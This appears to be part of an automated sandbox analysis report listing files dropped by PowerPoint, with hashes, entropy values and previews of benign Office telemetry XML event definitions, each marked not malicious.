                                                                                                                              Size (bytes):1351
                                                                                                                              Entropy (8bit):4.8450235834940685
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9A7DluMt1k3BNjXMi+EsdnKE+2h6wl/FfGz:cOHluMteNjXMzbdKshBdez
                                                                                                                              MD5:CFE543816FFD6673341C7391165B29FE
                                                                                                                              SHA1:26DB9A356E6D6F7C398B75079965030BC830FCFB
                                                                                                                              SHA-256:978FAC4DE66D33F98198203B490D7588A69C71604FF1373F889212E24ABE231B
                                                                                                                              SHA-512:527251D533D7B7D434F1F4CB29A7EEC8B241DA7A0E2204449DA9E81A0C5EE3FAC824F412D6F8B6FC22FD6EA7362672709D8E37BC63CE22BD4E3C033C5BD3672C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenML" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1388
                                                                                                                              Entropy (8bit):4.882059181952758
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9vjqeDluct1k3BNjXMi+EsdnKE+2h6wl/FfGz:cJqulucteNjXMzbdKshBdez
                                                                                                                              MD5:4D6D96F7C89EF1BCD191FEB18744511B
                                                                                                                              SHA1:D0F5AE7A901461C509B1CCFE216F057B812B35FE
                                                                                                                              SHA-256:A113433CB369766811C09887D0DDF5117CC7A178489F0DB0C4D1F5E9DEA8523A
                                                                                                                              SHA-512:B7A2EBECCEC4A12F71D9E5628150EBC6F86E169132BDF40EF0F04397A50F82CA1C28E5C929A99E940F217155BF5FB04A889BEFC22CF62EC11A999526B16694F8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenML" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.8575454867833265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9aLDVuMt1k3BNjXMi+EsdnKE+2h6wl/Ff3:cY3VuMteNjXMzbdKshBdv
                                                                                                                              MD5:CABB0385BB66E5DC371590623C32ED02
                                                                                                                              SHA1:8E611EC8927D51B6CE947567E6D5985ED47B2F78
                                                                                                                              SHA-256:618F8D832BD4F54B016BC090E98A60508D564286BD81BE049071E209CD7F12F4
                                                                                                                              SHA-512:A109475FD973D3C123190F315732095202770AE5A3549D5A3F1685C27E7C091E4B714F264692EE9804DF78EBF242515C395687A2C74691441E7A99F5DBC676D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProject" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.891463643270291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9lJDVuct1k3BNjXMi+EsdnKE+2h6wl/Ff3:cDZVucteNjXMzbdKshBdv
                                                                                                                              MD5:750A77DD35B8545C846C702F05340D54
                                                                                                                              SHA1:D65AC0B396D633D53C9FF88E72F232CCE5EA14B9
                                                                                                                              SHA-256:293B3954DF0FD4372B74F7FACB28D7F7FB746B91654C1C439DF8E09B3CFE38CF
                                                                                                                              SHA-512:FC6870B552E62F7A750CE234A9D07E4D95F29F7B05A693993E6D7F0926D98528C3921E5AA97D91382F063ECC81AEDE1E5B37E1A33A4D9C0A04E99E0AC09F62C7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProject" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.860956043026469
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9v8DguMt1k3BNjXMi+EsdnKE+2h6wl/FfmS8ec:c1wguMteNjXMzbdKshBdOL
                                                                                                                              MD5:1CE5913AF2B5F72E0B0F8EAB0BE8E266
                                                                                                                              SHA1:4B566C33DF3EF0548F6F71C1ABBD6EFAE3011E73
                                                                                                                              SHA-256:D997C5C6E2AA2CD9E2ABC3014D72396B85CD4B43E978D4546A7003D0B440D684
                                                                                                                              SHA-512:F3B148F87E9FD7C5765543C35D6DA00B1CC2E03EA3D763FD024D5ACD18414D96F09B51EB07A57EB2EF04CE24F36249235627474BB85500F9861A5367307245B6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.896099533418246
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9k1wDguct1k3BNjXMi+EsdnKE+2h6wl/FfmS8ec:cK1UgucteNjXMzbdKshBdOL
                                                                                                                              MD5:E0C15863E759C7F593DC1A04CB4475A6
                                                                                                                              SHA1:B864E5843A5C58927A419EEE43EFBC2ECE5F8455
                                                                                                                              SHA-256:1CD727AFC748A855C207E875E57E67987304A5B9F5BA0F0E65321EFC9E84A73F
                                                                                                                              SHA-512:A32D2FE4E4842956D406F32D734E34CAB83A1033D46D98B207C8305051B3403F6B750CED2A2B43FC6946E9B80F4A3FB9EB1C3B10D1A37636A1FE6D9B7020F8F3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1367
                                                                                                                              Entropy (8bit):4.8601857535171655
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9/XNDGEXuMt1k3BNjXMi+EsdnKE+2h6wl/FfOnEc:ch9juMteNjXMzbdKshBdML
                                                                                                                              MD5:D38B0A5D5BACC4183C16D4658431C5D9
                                                                                                                              SHA1:CC870E920915F5DA9FDBC177F3ECA66111BF40D2
                                                                                                                              SHA-256:F12AD7AAFE8A663CDED48BF5AA3EF9AAD334EA1254FC59E304ACD2533DB36E17
                                                                                                                              SHA-512:AFD26230A1FD7BDE585B326115689B92F8982E4F004195276666E241603D95D8E1360C11AAE6C361F3C19DE097A2B2EC0781A7815E5CBD6DAC33A1C75AF7ABBC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702400" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Compliance" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCompliance" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.89369333887998
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d90XXDGEXuct1k3BNjXMi+EsdnKE+2h6wl/FfOnEc:cmDjucteNjXMzbdKshBdML
                                                                                                                              MD5:822794C66A8AB57B7AA0200FBEA87C4E
                                                                                                                              SHA1:A4780F7FC418F55D5C1C9919FE872FE00CDEBE68
                                                                                                                              SHA-256:FAF758BDD27A5B3FF78764346495D2E2CA2F4222A106E3F46E156165C03191F0
                                                                                                                              SHA-512:82614AB16D86118F63A88C6848FAA788EE4F1E82850F40039ACA76A899EF48077833A5DDCFBEE8489234326944ACF92CE2856B3C898C80D2565689397AC1E609
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702401" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Compliance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCompliance" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.857265439256473
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9qEDAuMt1k3BNjXMi+EsdnKE+2h6wl/FfsQkRc8z:cMYAuMteNjXMzbdKshBd5kRcC
                                                                                                                              MD5:14DED8518922A53B7923A9BE2CCCAF26
                                                                                                                              SHA1:DFF3BBB86A2CAF886F54C1ED90C5823E112BA975
                                                                                                                              SHA-256:FA5488CD9A6BDDE6BBD5F97F5787E168E1F0963EB6BB582DB43846A978F750AD
                                                                                                                              SHA-512:FDD3D07BEAE92AD18F320DEB051AD85313556372C4F4935F5ECF2E88981F14433942E423C016187FCA2F91AD0A81FA6D57578BBF256C90495A8E46E4DCA79C8B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Access" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAccess" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.891847134561355
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d91IDAuct1k3BNjXMi+EsdnKE+2h6wl/FfsQkRc8z:cXMAucteNjXMzbdKshBd5kRcC
                                                                                                                              MD5:9D6AAD18C5340CA0DFE89276C63F1A38
                                                                                                                              SHA1:08428AA083261A4E0A85C7237B05526E5BBC030D
                                                                                                                              SHA-256:3252787E6DB6D6F4D5284F5D403C8D020EA1845E217B127CC34D645168ED6813
                                                                                                                              SHA-512:85B57E30D183C8831A23D0B1C2513F0044F681AB68D5DF1F9419F3928925BA28E356F20DE63BC444896FB2F2E06601C2E76F26192CF2019D3B2B6BAD902C132C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Access.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAccess" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1377
                                                                                                                              Entropy (8bit):4.874186173241039
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9chD/uMt1k3BNjXMi+EsdnKE+2h6wl/FfiGS9:cOR/uMteNjXMzbdKshBdPc
                                                                                                                              MD5:EDF0612FFF076A8D46C063D2D312CF7C
                                                                                                                              SHA1:8898030DE0AD851893A1703C3936637C095D7C14
                                                                                                                              SHA-256:D4417BC67DF4A3189A4030A211799F6DD097841A9D4DF6B64C5DE04451308901
                                                                                                                              SHA-512:E51611AD0CB8BACBF2B082A65091C24AFFD150012F199509D5BC669752E8CB7E3753B3700A9FCEE93B7DE16932B95957F90FA5F1BD2F733211CCC2648206C531
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="f
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1414
                                                                                                                              Entropy (8bit):4.905863048995714
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9nrD/uct1k3BNjXMi+EsdnKE+2h6wl/FfiGS9:cJX/ucteNjXMzbdKshBdPc
                                                                                                                              MD5:64BEA3D5636B437D569F3F6DACBE8B73
                                                                                                                              SHA1:B04054A0A4E64234B6378179DBE0176AC2199922
                                                                                                                              SHA-256:BC5E11806B5118AC6B6EAA7E8EDD234302D418A379377467D183D7AEC6605020
                                                                                                                              SHA-512:D1C18B4DBF70B864BB877AA1B2F77CCD5EAC6D47242918AB1706B478646CB36F0D4F2E31CDC46841D45AB29269B045218E99B441B6A8AAF26A997B65B6C50E87
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1377
                                                                                                                              Entropy (8bit):4.86968935598947
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9Jj0jDApuMt1k3BNjXMi+EsdnKE+2h6wl/FfeX4WGVSH:cfj0PApuMteNjXMzbdKshBd17Q
                                                                                                                              MD5:7E769AA0B30512CAEA169E76720A8BB6
                                                                                                                              SHA1:A106C3EA653C018707822D56D1D55D3E9C1CEDCE
                                                                                                                              SHA-256:CF387A3BF6721E44C234F0FBC1D450C301E9C4C73F38D9353CC79E182724CE04
                                                                                                                              SHA-512:8914A2DBEC611B84E8106BE670C5B88D883276217B069A4245EB86E5F061E57C623CB57BEAFF09470F23F038187311F8487C416B58B38034147908E0D79A49C4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="f
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1414
                                                                                                                              Entropy (8bit):4.901920052386891
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d92CDApuct1k3BNjXMi+EsdnKE+2h6wl/FfeX4WGVSH:cQCApucteNjXMzbdKshBd17Q
                                                                                                                              MD5:F16096A8504154B1BA78953D9AA77970
                                                                                                                              SHA1:EE25EDB8E4E0E2036B021DEABEFDC33FD02EAC1A
                                                                                                                              SHA-256:EA3FD83EC8EC8E89BF29A1BA2A3AE67EB676897A6790CAEA162394D9945B3B35
                                                                                                                              SHA-512:18C43D15FC52A8F7BA3D345E500ADD6BB6B7FE764E5DFC7ACC8B8ADFD2F1F26CE5264EF2462D87A70C22ABC04417669EBAFA84B69A10A136489EC4F3F5F4DABB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1371
                                                                                                                              Entropy (8bit):4.865695804192339
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9BjDFuMt1k3BNjXMi+EsdnKE+2h6wl/FftI:cfPFuMteNjXMzbdKshBde
                                                                                                                              MD5:44EA22233A3BA65F69A91CBFC74EE941
                                                                                                                              SHA1:11A54DEA94DB48356C769DE7DACC88F8344CE53F
                                                                                                                              SHA-256:177467AC052CFD3F1A38BBA0A883F78E11B9753CD5DD9818B4CEA7E5146540CC
                                                                                                                              SHA-512:9C1BC17CD7C0F7F60E12CAE9F9CB78C1E6B6FF41302AA22C2296E4F7BB392DE058D1E177E56A7E6B79BFF7C6870D49995BC69D8120CFD45305B7BA86FE4A23C5
                                                                                                                              Malicious:false
